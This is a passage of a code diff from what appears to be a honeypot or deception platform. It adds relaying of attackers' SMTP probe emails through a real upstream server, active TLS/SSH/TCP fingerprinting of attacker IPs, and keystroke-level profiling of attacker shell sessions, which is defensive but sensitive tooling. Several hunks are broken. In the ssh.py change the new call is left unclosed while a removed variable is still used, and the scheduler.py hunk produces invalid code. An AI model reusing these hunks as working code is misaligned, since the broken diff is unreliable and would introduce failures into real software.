    artifacts_root: str = _ARTIFACTS_ROOT_DEFAULT,
 ) -> tuple[bool, str]:
    """Read the .eml from disk and forward it via the upstream relay.
    Returns (True, "") on success or (False, reason) on failure.
    Always safe to call in a thread — uses only blocking I/O.
    """
    upstream_host = (svc_cfg.get("upstream_host") or "").strip()
    if not upstream_host:
        return False, "upstream_host not configured"
    eml_path = Path(artifacts_root) / decky_name / "smtp" / stored_as
    try:
        body = eml_path.read_bytes()
    except OSError as exc:
        return False, f"cannot read eml: {exc}"
    if not rcpt_to:
        return False, "no recipients"
    upstream_port  = int(svc_cfg.get("upstream_port") or 25)
    upstream_user  = (svc_cfg.get("upstream_user") or "").strip()
    upstream_pass  = (svc_cfg.get("upstream_pass") or "").strip()
    envelope_from  = (svc_cfg.get("upstream_sender") or "").strip() or mail_from
    # Ensure the message has a From: header so mail clients show the attacker's
    # address rather than falling back to the envelope sender (upstream_sender).
    # Minimal relay-test scripts often omit headers entirely.
    body = _ensure_from_header(body, mail_from)
    try:
        with smtplib.SMTP(upstream_host, upstream_port, timeout=15) as conn:
            conn.ehlo()
            if conn.has_extn("STARTTLS"):
                conn.starttls()
                conn.ehlo()
            if upstream_user and upstream_pass:
                conn.login(upstream_user, upstream_pass)
            conn.sendmail(envelope_from, rcpt_to, body)
        return True, ""
    except Exception as exc:
        return False, str(exc)[:256]
--- a/decnet/orchestrator/drivers/ssh.py
+++ b/decnet/orchestrator/drivers/ssh.py
@@ -18,11 +18,8 @@ or IP can't escape into a shell.
 from __future__ import annotations
 import asyncio
 import shlex
 from typing import Any
-
+from datetime import datetime
 import base64
 from datetime import datetime, timezone
 from decnet.logging import get_logger
 from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
@@ -226,36 +223,24 @@ class SSHDriver(ActivityDriver):
    ) -> ActivityResult:
        """Write *content* to *path* inside *decky_name*'s ssh container.
-        Streams base64 via stdin (mirrors :mod:`decnet.canary.planter`'s
+        Delegates to :func:`decnet.decky_io.write_file_to_container`,
-        ARG_MAX-safe write — see commit c17b9e0).  Sets file mode and,
+        which carries the ARG_MAX-safe base64-via-stdin trick.  Sets
-        when *mtime* is provided, ``touch -d`` to backdate the file so
+        file mode and, when *mtime* is provided, ``touch -d`` to
-        it doesn't all stamp at wall-clock-now (the realism failure
+        backdate the file (otherwise everything stamps at wall-clock-now
-        this migration is fixing).
+        — the realism failure this path was originally fixing).
        """
        from decnet.decky_io import write_file_to_container
        container = _container_for(decky_name)
-        b64 = base64.b64encode(content).decode("ascii")
+        success, error = await write_file_to_container(
-        # touch -d accepts ISO 8601; we always emit UTC so the
+            container, path, content, mode=mode, mtime=mtime, timeout=_TIMEOUT,
        # container's local TZ doesn't drift the mtime.
        if mtime is not None:
            ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
            touch_cmd = f"touch -d {shlex.quote(ts)} {shlex.quote(path)}"
        else:
            touch_cmd = f"touch {shlex.quote(path)}"
        sh_cmd = (
            f"mkdir -p {shlex.quote(_dirname(path))} && "
            f"base64 -d > {shlex.quote(path)} && "
            f"chmod {mode:o} {shlex.quote(path)} && "
            f"{touch_cmd}"
        )
        argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
        rc, _stdout, stderr = await _run_with_stdin(argv, b64.encode("ascii"))
        success = rc == 0
        payload: dict[str, Any] = {
            "dst_decky": decky_name,
            "path": path,
            "bytes": len(content),
-            "rc": rc,
+            "rc": 0 if success else 1,
-            "stderr": stderr.strip()[:256] if not success else None,
+            "stderr": error if not success else None,
        }
        return ActivityResult(success=success, payload=payload)
@@ -283,11 +268,3 @@ class SSHDriver(ActivityDriver):
        )
 def _dirname(path: str) -> str:
    """Pure-string dirname.  We can't trust ``os.path.dirname`` on the
    host to share the destination container's separator semantics, but
    deckies are POSIX so a plain ``rfind('/')`` suffices."""
    idx = path.rfind("/")
    if idx <= 0:
        return "/"
    return path[:idx]
--- a/decnet/orchestrator/emailgen/scheduler.py
+++ b/decnet/orchestrator/emailgen/scheduler.py
@@ -131,13 +131,13 @@ async def _resolve_personas(
        topology = await repo.get_topology(topology_id)
        if not topology:
            return [], source
-        return (
+        if isinstance(topology, dict):
-            parse_personas(
+            raw = topology.get("email_personas")
-                topology.get("email_personas"),
+            lang = topology.get("language_default") or "en"
-                language_default=topology.get("language_default") or "en",
+        else:
-            ),
+            raw = topology.email_personas
-            source,
+            lang = topology.language_default or "en"
-        )
+        return parse_personas(raw, language_default=lang), source
    # Fleet / shard / anything else → global pool.
    return global_pool.load(), source
@@ -175,7 +175,7 @@ async def pick(
        )
        return None
-    active = [p for p in personas if in_active_hours(p, now_dt.hour)]
+    active = [p for p in personas if in_active_hours(p, now_dt)]
    if len(active) < 2:
        logger.debug(
            "emailgen pick: source=%s mail_decky=%s only %d personas in-hours",
--- a/decnet/orchestrator/scheduler.py
+++ b/decnet/orchestrator/scheduler.py
@@ -311,17 +311,22 @@ async def _resolve_personas(
    return enriched
-def _topology_personas(topology: Optional[dict[str, Any]]) -> list[EmailPersona]:
+def _topology_personas(topology) -> list[EmailPersona]:
    if not topology:
        return []
-    raw = topology.get("email_personas")
+    if isinstance(topology, dict):
        raw = topology.get("email_personas")
        lang = topology.get("language_default") or "en"
    else:
        raw = topology.email_personas
        lang = topology.language_default or "en"
    if raw is None:
        return []
    if isinstance(raw, list):
-        return parse_personas(raw, language_default=topology.get("language_default") or "en")
+        return parse_personas(raw, language_default=lang)
    if isinstance(raw, str):
        try:
-            return parse_personas(json.loads(raw), language_default=topology.get("language_default") or "en")
+            return parse_personas(json.loads(raw), language_default=lang)
        except json.JSONDecodeError:
            return []
    return []
--- a/decnet/orchestrator/worker.py
+++ b/decnet/orchestrator/worker.py
@@ -25,6 +25,7 @@ import secrets
 from datetime import datetime, timezone
 from typing import Any, Optional
 from decnet.bus import topics as _topics
 from decnet.bus.factory import get_bus
 from decnet.bus.publish import (
    publish_safely,
@@ -34,6 +35,7 @@ from decnet.bus.publish import (
 from decnet.logging import get_logger
 from decnet.orchestrator import events, scheduler
 from decnet.orchestrator.drivers import get_driver_for
 from decnet.orchestrator.drivers.smtp_relay import forward_probe
 from decnet.orchestrator.emailgen import (
    events as email_events,
    scheduler as email_scheduler,
@@ -127,6 +129,7 @@ async def orchestrator_worker(
    # operator's intent rather than the baked-in defaults. A failure
    # here logs and falls through; the planner already holds defaults.
    await _refresh_realism_config(repo)
    await _refresh_llm_config(repo)
    shutdown = asyncio.Event()
    heartbeat_task = asyncio.create_task(
@@ -138,6 +141,9 @@ async def orchestrator_worker(
    control_task = asyncio.create_task(
        run_control_listener(bus, "orchestrator", shutdown),
    )
    probe_task = asyncio.create_task(
        _run_smtp_probe_listener(repo, shutdown),
    )
    tick_n = 0
    try:
        while not shutdown.is_set():
@@ -156,8 +162,9 @@ async def orchestrator_worker(
                await _periodic_prune(repo)
            if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
                await _refresh_realism_config(repo)
                await _refresh_llm_config(repo)
    finally:
-        for t in (heartbeat_task, control_task):
+        for t in (heartbeat_task, control_task, probe_task):
            t.cancel()
            with contextlib.suppress(Exception, asyncio.CancelledError):
                await t
@@ -218,6 +225,18 @@ async def _refresh_realism_config(repo: BaseRepository) -> None:
        logger.warning("realism config refresh: rejected payload: %s", exc)
 async def _refresh_llm_config(repo: BaseRepository) -> None:
    """Pull operator-tuned LLM config from realism_config into the backend cache."""
    from decnet.realism.llm.config import apply, load_from_db
    cfg = await load_from_db(repo)
    if cfg is None:
        return
    try:
        apply(cfg)
    except Exception as exc:  # noqa: BLE001
        logger.warning("llm config refresh: apply failed: %s", exc)
 def _roll_action_kind(rng: secrets.SystemRandom) -> str:
    total = sum(w for _, w in _ACTION_WEIGHTS)
    target = rng.randint(1, total)
@@ -303,7 +322,7 @@ async def _pick_action(
            )
        elif kind == "email":
            try:
-                action = await email_scheduler.pick(repo, rand=rng)
+                action = await email_scheduler.pick(repo, rand=rng)  # type: ignore[assignment]
            except Exception as exc:  # noqa: BLE001
                logger.debug("orchestrator: email pick failed: %s", exc)
                action = None
@@ -467,6 +486,100 @@ async def _bump_synthetic_file_after_edit(repo, action, result) -> None:
    await repo.update_synthetic_file(action.synthetic_file_uuid, patch)
 async def _run_smtp_probe_listener(
    repo: BaseRepository,
    shutdown: asyncio.Event,
 ) -> None:
    """Subscribe to smtp.probe.pending and forward probe emails upstream.
    Runs as a long-lived subtask alongside the tick loop. When a probe lands
    we check if this (attacker_ip, decky) has already been forwarded up to
    probe_limit times — if not, forward via the master's real internet
    connection and store a probe_relay bounty with the result.
    """
    try:
        bus = get_bus(client_name="orchestrator-probe")
        await bus.connect()
        sub = bus.subscribe(_topics.smtp("probe.pending"))
        async with sub:
            async for event in sub:
                if shutdown.is_set():
                    break
                try:
                    await _handle_probe_pending(repo, event.payload)
                except Exception as exc:  # noqa: BLE001
                    logger.warning("smtp probe listener: handle error: %s", exc)
    except asyncio.CancelledError:
        raise
    except Exception as exc:  # noqa: BLE001
        logger.warning("smtp probe listener: bus unavailable: %s", exc)
    finally:
        with contextlib.suppress(Exception):
            await bus.close()
 async def _handle_probe_pending(repo: BaseRepository, payload: dict) -> None:
    decky_name  = (payload.get("decky") or "").strip()
    attacker_ip = (payload.get("attacker_ip") or "").strip()
    stored_as   = (payload.get("stored_as") or "").strip()
    mail_from   = (payload.get("mail_from") or "").strip()
    rcpt_to_raw = (payload.get("rcpt_to") or "").strip()
    if not (decky_name and attacker_ip and stored_as):
        return
    decky_row = await repo.get_fleet_decky_by_name(decky_name)
    if not decky_row:
        return
    svc_cfg = (
        (decky_row.get("decky_config") or {})
        .get("service_config", {})
        .get("smtp_relay") or {}
    )
    if not (svc_cfg.get("upstream_host") or "").strip():
        return
    probe_limit = int(svc_cfg.get("probe_limit") or 1)
    already_sent = await repo.count_probe_relays(attacker_ip, decky_name)
    if already_sent >= probe_limit:
        return
    rcpt_to = [r.strip() for r in rcpt_to_raw.split(",") if r.strip()]
    artifacts_root = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
    loop = asyncio.get_event_loop()
    ok, reason = await loop.run_in_executor(
        None,
        lambda: forward_probe(
            svc_cfg=svc_cfg,
            stored_as=stored_as,
            decky_name=decky_name,
            mail_from=mail_from,
            rcpt_to=rcpt_to,
            artifacts_root=artifacts_root,
        ),
    )
    await repo.add_bounty({
        "decky": decky_name,
        "service": "smtp_relay",
        "attacker_ip": attacker_ip,
        "bounty_type": "probe_relay",
        "payload": {
            "stored_as": stored_as,
            "forwarded": ok,
            **({"fwd_error": reason} if not ok else {}),
        },
    })
    if ok:
        logger.info("smtp probe forwarded decky=%s ip=%s", decky_name, attacker_ip)
    else:
        logger.warning(
            "smtp probe forward failed decky=%s ip=%s error=%s",
            decky_name, attacker_ip, reason,
        )
 async def _record_synthetic_file(repo, action) -> None:
    """Persist (or patch) a synthetic_files row after a FileAction plant.
--- a/decnet/prober/tcpfp.py
+++ b/decnet/prober/tcpfp.py
@@ -48,7 +48,7 @@ def _send_syn(
    Craft a TCP SYN with common options and send it. Returns the
    SYN-ACK response packet or None on timeout/failure.
    """
-    from scapy.all import IP, TCP, conf, sr1
+    from scapy.all import IP, TCP, conf, sr1  # type: ignore[attr-defined]
    # Suppress scapy's noisy output
    conf.verb = 0
@@ -83,7 +83,7 @@ def _send_syn(
        return None
    # Verify it's a SYN-ACK (flags == 0x12)
-    from scapy.all import TCP as TCPLayer
+    from scapy.all import TCP as TCPLayer  # type: ignore[attr-defined]
    if not resp.haslayer(TCPLayer):
        return None
    if resp[TCPLayer].flags != 0x12:  # SYN-ACK
@@ -103,7 +103,7 @@ def _send_rst(
 ) -> None:
    """Send RST to clean up the half-open connection."""
    try:
-        from scapy.all import IP, TCP, send
+        from scapy.all import IP, TCP, send  # type: ignore[attr-defined]
        rst = (
            IP(dst=host)
            / TCP(
@@ -124,7 +124,7 @@ def _parse_synack(resp: Any) -> dict[str, Any]:
    """
    Extract fingerprint fields from a scapy SYN-ACK response packet.
    """
-    from scapy.all import IP, TCP
+    from scapy.all import IP, TCP  # type: ignore[attr-defined]
    ip_layer = resp[IP]
    tcp_layer = resp[TCP]
--- a/decnet/prober/worker.py
+++ b/decnet/prober/worker.py
@@ -27,6 +27,9 @@ from datetime import datetime, timezone
 from pathlib import Path
 from typing import Any, Callable
 from sqlalchemy.engine import Engine
 from sqlmodel import Session
 from decnet.bus import topics as _topics
 from decnet.bus.base import BaseBus
 from decnet.bus.factory import get_bus
@@ -35,6 +38,10 @@ from decnet.bus.publish import (
    run_control_listener,
    run_health_heartbeat,
 )
 from decnet.correlation.fingerprint_rotation import (
    ProbeType,
    record_fingerprint,
 )
 from decnet.logging import get_logger
 from decnet.prober.hassh import hassh_server
 from decnet.prober.jarm import JARM_EMPTY_HASH, jarm_hash
@@ -44,6 +51,21 @@ from decnet.telemetry import traced as _traced
 logger = get_logger("prober")
 def _build_sync_engine() -> Engine:
    """Construct a sync SQLite engine for rotation-detection state.
    Used inline by the prober; it lives outside the async repository
    layer because rotation detection is a sync hook on a sync probe
    path.  Honors the same defaulting as
    ``decnet.web.db.sqlite.repository.SQLiteRepository``.
    """
    import os
    from decnet.config import _ROOT
    from decnet.web.db.sqlite.database import get_sync_engine
    db_path = os.environ.get("DECNET_DB_PATH", str(_ROOT / "decnet.db"))
    return get_sync_engine(db_path)
 # ─── Default ports per probe type ───────────────────────────────────────────
 # JARM: common C2 callback / TLS server ports
@@ -233,6 +255,14 @@ def _discover_attackers(json_path: Path, position: int) -> tuple[set[str], int]:
 ProbePublishFn = Callable[[str, dict[str, Any]], None]
 # Rotation recorder: takes (attacker_ip, port, probe_type, new_hash) and
 # performs the rotation-detection upsert + derived-event emission for the
 # DEBT-032 substrate-fingerprint flow.  Optional; when None the prober
 # behaves exactly as before (raw fingerprint emit only, no rotation
 # detection).  Construction lives at worker startup so phase functions
 # don't have to know about the DB engine.
 RotationRecorderFn = Callable[[str, int, "ProbeType", str], None]
@_traced("prober.probe_cycle")
 def _probe_cycle(
@@ -245,6 +275,7 @@ def _probe_cycle(
    json_path: Path,
    timeout: float = 5.0,
    publish_fn: ProbePublishFn | None = None,
    record_rotation: RotationRecorderFn | None = None,
 ) -> None:
    """
    Probe all known attacker IPs with JARM, HASSH, and TCP/IP fingerprinting.
@@ -263,13 +294,13 @@ def _probe_cycle(
        ip_probed = probed.setdefault(ip, {})
        # Phase 1: JARM (TLS fingerprinting)
-        _jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn)
+        _jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn, record_rotation)
        # Phase 2: HASSHServer (SSH fingerprinting)
-        _hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn)
+        _hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn, record_rotation)
        # Phase 3: TCP/IP stack fingerprinting
-        _tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn)
+        _tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn, record_rotation)
@_traced("prober.jarm_phase")
@@ -281,6 +312,7 @@ def _jarm_phase(
    json_path: Path,
    timeout: float,
    publish_fn: ProbePublishFn | None = None,
    record_rotation: RotationRecorderFn | None = None,
 ) -> None:
    """JARM-fingerprint an IP on the given TLS ports."""
    done = ip_probed.setdefault("jarm", set())
@@ -301,6 +333,8 @@ def _jarm_phase(
                msg=f"JARM {ip}:{port} = {h}",
            )
            logger.info("prober: JARM %s:%d = %s", ip, port, h)
            if record_rotation is not None:
                record_rotation(ip, port, "jarm", h)
            if publish_fn is not None:
                publish_fn(
                    "jarm",
@@ -387,6 +421,7 @@ def _hassh_phase(
    json_path: Path,
    timeout: float,
    publish_fn: ProbePublishFn | None = None,
    record_rotation: RotationRecorderFn | None = None,
 ) -> None:
    """HASSHServer-fingerprint an IP on the given SSH ports."""
    done = ip_probed.setdefault("hassh", set())
@@ -412,6 +447,8 @@ def _hassh_phase(
                msg=f"HASSH {ip}:{port} = {result['hassh_server']}",
            )
            logger.info("prober: HASSH %s:%d = %s", ip, port, result["hassh_server"])
            if record_rotation is not None:
                record_rotation(ip, port, "hassh", result["hassh_server"])
            if publish_fn is not None:
                publish_fn(
                    "hassh",
@@ -445,6 +482,7 @@ def _tcpfp_phase(
    json_path: Path,
    timeout: float,
    publish_fn: ProbePublishFn | None = None,
    record_rotation: RotationRecorderFn | None = None,
 ) -> None:
    """TCP/IP stack fingerprint an IP on the given ports."""
    done = ip_probed.setdefault("tcpfp", set())
@@ -478,6 +516,8 @@ def _tcpfp_phase(
                msg=f"TCPFP {ip}:{port} = {result['tcpfp_hash']}",
            )
            logger.info("prober: TCPFP %s:%d = %s", ip, port, result["tcpfp_hash"])
            if record_rotation is not None:
                record_rotation(ip, port, "tcpfp", result["tcpfp_hash"])
            if publish_fn is not None:
                publish_fn(
                    "tcpfp",
@@ -586,6 +626,61 @@ async def prober_worker(
            event_type,
        )
    # Substrate-rotation detection (DEBT-032) — open a sync engine for
    # the prober's lifetime; recorder closes a session per call so we
    # never hold a connection across phase boundaries.  Failure to
    # connect is non-fatal: probes continue, rotation detection is
    # silently disabled.
    rotation_engine: Engine | None = None
    record_rotation: RotationRecorderFn | None = None
    try:
        rotation_engine = _build_sync_engine()
    except Exception as exc:  # noqa: BLE001
        logger.warning(
            "prober: rotation-detection DB unavailable, "
            "running with rotation detection disabled: %s", exc,
        )
    if rotation_engine is not None:
        def _publish_rotation(event_type: str, payload: dict[str, Any]) -> None:
            raw_publish(
                _topics.attacker(_topics.ATTACKER_FINGERPRINT_ROTATED),
                payload,
                event_type,
            )
        def _syslog_rotation(event_type: str, payload: dict[str, Any]) -> None:
            _write_event(
                log_path, json_path,
                "fingerprint_rotated",
                target_ip=payload["attacker_ip"],
                target_port=str(payload["port"]),
                probe_type=payload["probe_type"],
                old_hash=payload.get("old_hash") or "",
                new_hash=payload["new_hash"],
                rotation_count=str(payload["rotation_count"]),
                msg=(
                    f"FP rotation {payload['attacker_ip']}:{payload['port']} "
                    f"{payload['probe_type']} {payload.get('old_hash')} → "
                    f"{payload['new_hash']}"
                ),
            )
        def record_rotation(
            ip: str, port: int, probe_type: ProbeType, new_hash: str,
        ) -> None:
            with Session(rotation_engine) as session:
                record_fingerprint(
                    session,
                    attacker_ip=ip,
                    port=port,
                    probe_type=probe_type,
                    new_hash=new_hash,
                    ts=datetime.now(timezone.utc),
                    publish_fn=_publish_rotation,
                    syslog_fn=_syslog_rotation,
                )
    shutdown = asyncio.Event()
    heartbeat_task = asyncio.create_task(run_health_heartbeat(bus, "prober"))
    control_task = asyncio.create_task(
@@ -612,6 +707,7 @@ async def prober_worker(
                    jarm_ports, hassh_ports, tcp_ports,
                    log_path, json_path, timeout,
                    _publish_attacker,
                    record_rotation,
                )
            try:
@@ -626,3 +722,6 @@ async def prober_worker(
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
        if rotation_engine is not None:
            with contextlib.suppress(Exception):
                rotation_engine.dispose()
--- a/decnet/profiler/behave_shell/init.py
+++ b/decnet/profiler/behave_shell/init.py
@@ -0,0 +1,25 @@
 """BEHAVE-SHELL extraction engine — DECNET's official implementation.
 Per ``development/BEHAVE-EXTRACTOR.md``: this package is a pure
 library. Workers (``BEHAVE-INTEGRATION.md`` Phase 4) own I/O, bus
 emission, and persistence. The engine just turns one PTY session into
 ``Iterable[Observation]``.
 BEHAVE is the spec; DECNET is the engine.
 """
 from __future__ import annotations
 from decnet.profiler.behave_shell.extract import (
    DEFAULT_SOURCE,
    build_context,
    extract_session,
 )
 # Phase H.5-pre: extractor is feature-complete (37/37 Tier-A primitives
 # emit; calibration grid honest). The ``-pre`` suffix stays until
 # ``BEHAVE-INTEGRATION.md`` Phase 4 lands the worker wiring + observations
 # table writes + AttackerDetail panel; only then does H.5 proper drop the
 # suffix and tag v0.
 __version__ = "0.1.0-pre"
 __all__ = ["DEFAULT_SOURCE", "build_context", "extract_session", "__version__"]
--- a/decnet/profiler/behave_shell/_ctx.py
+++ b/decnet/profiler/behave_shell/_ctx.py
@@ -0,0 +1,573 @@
 """SessionContext: precomputed bundle every feature function reads from.
 A naïve engine re-walks the event stream once per primitive. We don't
 do that — one walk over the events builds this context, every feature
 reads from it. Adding a new feature is O(1) cost on the parse side.
 Step 1 fills ``iats`` (inter-key intervals between input events) and
 ``paste_bursts`` (contiguous runs of paste-class events). Step 4
 will fill ``commands`` / ``inter_cmd_iats`` / ``output_per_cmd``.
 """
 from __future__ import annotations
 import math
 from dataclasses import dataclass, field
 from typing import Iterable, Mapping
 from decnet.profiler.behave_shell._intent import (
    LEXEME_MAX_LEN,
    NEGATIVE_LEXEMES,
    OBSCENITY_LEXEMES,
    POSITIVE_LEXEMES,
 )
 from decnet.profiler.behave_shell._parse import (
    AsciinemaEvent,
    Command,
    PasteBurst,
    PromptLine,
    detect_error_in_output,
    extract_prompt_lines,
    hash_token,
    strip_ansi,
 )
 from decnet.profiler.behave_shell._thresholds import (
    IKI_THINK_MAX_S,
    LAYOUT_BIGRAM_TOP_N,
    PASTE_BURST_MAX_IAT_S,
    PASTE_MIN_CHARS_PER_EVENT,
    PROMPT_LINE_MAX_CHARS,
    SHORTCUT_CTRL_BYTES,
 )
@dataclass(frozen=True, slots=True)
 class _LexCounters:
    """Lexical counters from the typed-text walk (G.0).
    Internal to the ctx-builder; flattened onto SessionContext fields
    in :func:`build_session_context`.
    """
    obscenity_hits: int = 0
    positive_lex_hits: int = 0
    negative_lex_hits: int = 0
    caps_run_max: int = 0
    bang_run_max: int = 0
@dataclass(frozen=True, slots=True)
 class SessionContext:
    sid: str
    source: str
    evidence_ref: str
    t_start: float
    t_end: float
    duration_s: float
    input_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
    output_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
    # Step 1 derivations
    iats: tuple[float, ...] = field(default_factory=tuple)
    paste_bursts: tuple[PasteBurst, ...] = field(default_factory=tuple)
    paste_event_count: int = 0
    # Step 4 derivations — command segmentation
    commands: tuple[Command, ...] = field(default_factory=tuple)
    inter_cmd_iats: tuple[float, ...] = field(default_factory=tuple)
    output_per_cmd: tuple[int, ...] = field(default_factory=tuple)
    # Step B.1 derivations — typing bursts (IATs split at think-pauses)
    typing_bursts: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
    # Step B.3 derivations — error-correction signals
    backspace_count: int = 0
    backspace_iats: tuple[float, ...] = field(default_factory=tuple)
    kill_line_count: int = 0
    # Step B.4 derivations — per-command intra-typing IATs
    intra_command_iats: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
    # Step F.0 derivations — PS1 prompt lines detected in the output stream
    prompt_lines: tuple[PromptLine, ...] = field(default_factory=tuple)
    # Step F.4 derivations — typed-only character histograms for keyboard
    # layout fingerprinting (PII boundary lifted by ANTI for Phase F).
    typed_unigram_counts: Mapping[str, int] = field(default_factory=dict)
    typed_bigram_counts: Mapping[str, int] = field(default_factory=dict)
    typed_letter_count: int = 0
    # Step G.0 derivations — lexical counters from the same single-pass
    # typed-text walk. No raw text retained; only fixed-vocabulary
    # membership counts and run-lengths. Drives valence (G.5), arousal
    # (G.6), and frustration_venting (G.8).
    obscenity_hits: int = 0
    positive_lex_hits: int = 0
    negative_lex_hits: int = 0
    caps_run_max: int = 0
    bang_run_max: int = 0
 def _detect_paste_bursts(
    inputs: list[AsciinemaEvent],
 ) -> tuple[tuple[PasteBurst, ...], int]:
    """Group consecutive paste-class input events into PasteBursts.
    A paste-class event is one with ``len(data) >= PASTE_MIN_CHARS_PER_EVENT``.
    Two adjacent paste-class events collapse into the same burst when
    their IAT is within ``PASTE_BURST_MAX_IAT_S``; otherwise a new
    burst opens. Returns the bursts and the total count of paste-class
    events (the same number ``BEHAVE`` prototype calls ``paste_events``).
    """
    bursts: list[PasteBurst] = []
    paste_count = 0
    cur_start: float | None = None
    cur_end: float = 0.0
    cur_chars: int = 0
    cur_events: int = 0
    last_t: float | None = None
    def _close() -> None:
        nonlocal cur_start, cur_end, cur_chars, cur_events
        if cur_start is not None and cur_events > 0:
            bursts.append(PasteBurst(
                start_ts=cur_start,
                end_ts=cur_end,
                char_count=cur_chars,
                event_count=cur_events,
            ))
        cur_start = None
        cur_end = 0.0
        cur_chars = 0
        cur_events = 0
    for t, _kind, data in inputs:
        is_paste = len(data) >= PASTE_MIN_CHARS_PER_EVENT
        if is_paste:
            paste_count += 1
            if cur_start is None or (
                last_t is not None and (t - last_t) > PASTE_BURST_MAX_IAT_S
            ):
                _close()
                cur_start = t
            cur_end = t
            cur_chars += len(data)
            cur_events += 1
        else:
            _close()
        last_t = t
    _close()
    return tuple(bursts), paste_count
 _BACKSPACE_CHARS = ("\x7f", "\x08")
 _KILL_LINE_CHARS = ("\x15", "\x17")
 def _scan_correction_signals(
    inputs: list[AsciinemaEvent],
 ) -> tuple[int, tuple[float, ...], int]:
    """Walk input events char-by-char, count backspaces / kill-lines /
    timing IATs.
    PII discipline: only counts and IATs leave this function — no
    character data is retained or returned.
    """
    backspace_count = 0
    kill_line_count = 0
    iats: list[float] = []
    last_non_bs_t: float | None = None
    for t, _kind, data in inputs:
        for c in data:
            if c in _BACKSPACE_CHARS:
                backspace_count += 1
                if last_non_bs_t is not None:
                    iats.append(max(0.0, t - last_non_bs_t))
            elif c in _KILL_LINE_CHARS:
                kill_line_count += 1
                last_non_bs_t = t
            else:
                last_non_bs_t = t
    return backspace_count, tuple(iats), kill_line_count
 def _split_typing_bursts(iats: tuple[float, ...]) -> tuple[tuple[float, ...], ...]:
    """Split a flat IAT sequence at gaps > IKI_THINK_MAX_S.
    Drops bursts of fewer than 3 IATs — too short to compute a stable
    CV. Mirrors BEHAVE prototype's ``_split_into_bursts``.
    """
    bursts: list[list[float]] = [[]]
    for x in iats:
        if x > IKI_THINK_MAX_S:
            if bursts[-1]:
                bursts.append([])
        else:
            bursts[-1].append(x)
    return tuple(tuple(b) for b in bursts if len(b) >= 3)
 def _segment_commands(inputs: list[AsciinemaEvent]) -> tuple[Command, ...]:
    """Walk input events, splitting on ``\\r`` / ``\\n`` into commands.
    Retains only the first whitespace-delimited token as a sha256 hash
    plus three integer counters needed for the Phase C
    ``motor.shell_mastery.*`` primitives:
    * ``tab_count``      — ``\\t`` (0x09) keystrokes in the command
    * ``shortcut_count`` — readline control bytes from
      :data:`SHORTCUT_CTRL_BYTES`
    * ``pipe_count``     — ``|`` characters in the command (counted on
      every byte; pasted pipelines still indicate pipeline fluency the
      operator chose to execute)
    Buffer contents are dropped on every command boundary; an
    unterminated trailing buffer (no final newline) yields no command.
    """
    cmds: list[Command] = []
    buf_chars: list[str] = []
    buf_start_ts: float | None = None
    tab_count = 0
    shortcut_count = 0
    pipe_count = 0
    for t, _kind, data in inputs:
        for c in data:
            if c in ("\r", "\n"):
                if buf_chars:
                    text = "".join(buf_chars).strip()
                    first_token = text.split(maxsplit=1)[0] if text else ""
                    cmds.append(Command(
                        start_ts=buf_start_ts if buf_start_ts is not None else t,
                        end_ts=t,
                        first_token_hash=hash_token(first_token),
                        tab_count=tab_count,
                        shortcut_count=shortcut_count,
                        pipe_count=pipe_count,
                    ))
                buf_chars = []
                buf_start_ts = None
                tab_count = 0
                shortcut_count = 0
                pipe_count = 0
            else:
                if not buf_chars:
                    buf_start_ts = t
                buf_chars.append(c)
                if c == "\t":
                    tab_count += 1
                elif c == "|":
                    pipe_count += 1
                elif c in SHORTCUT_CTRL_BYTES:
                    shortcut_count += 1
    return tuple(cmds)
 def _annotate_commands_with_output(
    commands: tuple[Command, ...],
    outputs: list[AsciinemaEvent],
 ) -> tuple[tuple[Command, ...], tuple[PromptLine, ...]]:
    """Re-emit ``commands`` with output-derived fields filled.
    Returns ``(commands, prompt_lines)``. Each ``Command`` gains
    ``errored``, ``output_bytes``, and ``followed_by_prompt`` (Step
    F.0). The flattened tuple of all detected ``PromptLine`` instances
    across every command's window is returned alongside for the caller
    to install on ``SessionContext.prompt_lines``.
    The output window for ``commands[i]`` spans from its ``end_ts``
    (the ``\\r``/``\\n`` that ran it) to the ``start_ts`` of the next
    command. The last command's window is open-ended (``math.inf``)
    so output events arriving at or after ``t_end`` are still captured.
    """
    if not commands:
        return commands, ()
    annotated: list[Command] = []
    all_prompts: list[PromptLine] = []
    for i, cmd in enumerate(commands):
        win_end = commands[i + 1].start_ts if i + 1 < len(commands) else math.inf
        byte_count, errored, prompts = _output_window(outputs, cmd.end_ts, win_end)
        all_prompts.extend(prompts)
        annotated.append(Command(
            start_ts=cmd.start_ts,
            end_ts=cmd.end_ts,
            first_token_hash=cmd.first_token_hash,
            tab_count=cmd.tab_count,
            shortcut_count=cmd.shortcut_count,
            pipe_count=cmd.pipe_count,
            errored=errored,
            output_bytes=byte_count,
            followed_by_prompt=bool(prompts),
        ))
    return tuple(annotated), tuple(all_prompts)
 def _per_command_iats(
    commands: tuple[Command, ...],
    inputs: list[AsciinemaEvent],
 ) -> tuple[tuple[float, ...], ...]:
    """Per-command IATs between consecutive input events whose
    timestamps fall in ``[cmd.start_ts, cmd.end_ts)``.
    Excludes the terminator IAT (the last event at ``cmd.end_ts`` is
    the ``\\r``/``\\n`` itself). Returns one tuple per command.
    """
    out: list[tuple[float, ...]] = []
    for cmd in commands:
        prev_t: float | None = None
        cmd_iats: list[float] = []
        for t, _kind, _data in inputs:
            if t < cmd.start_ts or t >= cmd.end_ts:
                continue
            if prev_t is not None:
                cmd_iats.append(max(0.0, t - prev_t))
            prev_t = t
        out.append(tuple(cmd_iats))
    return tuple(out)
 def _output_bytes_between(
